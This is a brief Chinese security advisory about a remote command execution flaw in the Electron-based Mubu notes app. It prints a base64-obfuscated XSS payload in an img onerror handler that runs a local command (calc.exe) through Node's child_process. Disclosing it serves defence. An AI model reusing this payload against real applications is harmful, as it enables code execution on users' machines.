【漏洞预警】幕布笔记存在远程命令执行漏洞

幕布笔记存在远程命令执行漏洞

漏洞概述:

Electron 是一个开源的跨平台框架,用于构建基于Web技术(HTMLCSSJavaScript)的桌面应用程序。它由 GitHub 公司开发并维护,目前具有 108k star

由于 Electron 内置了 Chromium 内核,并且拥有直接执行Nodejs代码的能力,攻击者可借助 XSS 漏洞在服务器端远程执行任意代码

当应用程序使用 Electron 框架时,通过接收攻击者精心构造的 Payload 后可能会产生命令执行漏洞

漏洞详情:

<img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewphbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsgCn0pOw==`,`base64`).toString())'>


阅读 10万+

免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐